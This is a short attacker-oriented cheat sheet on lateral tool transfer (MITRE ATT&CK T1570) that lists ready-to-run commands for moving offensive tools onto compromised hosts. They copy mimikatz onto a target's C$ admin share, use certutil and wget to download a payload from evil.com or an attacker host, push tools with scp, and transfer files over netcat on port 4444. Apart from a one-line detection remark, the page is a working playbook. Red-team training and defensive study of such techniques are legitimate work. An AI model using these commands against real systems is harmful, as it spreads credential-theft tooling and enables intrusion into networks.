Lateral Tool Transfer

Last Updated: January 5, 2026

lateral-movementfile-transferscpsmbcertutil

Lateral Tool Transfer (T1570)

Getting your toolkit to the beachhead.

Mounting the C$ share.

copy C:\Tools\mimikatz.exe \\Target\C$\Windows\Temp\mimi.exe

Built-in certificate utility that can download files.

certutil -urlcache -split -f http://evil.com/payload.exe C:\Temp\payload.exe

Detection: Highly monitored.

SCP: scp -i key tool.sh user@target:/tmp/
Wget/Curl: wget http://attacker/tool
Netcat:
- Receiver: nc -l -p 4444 > tool
- Sender: nc target 4444 < tool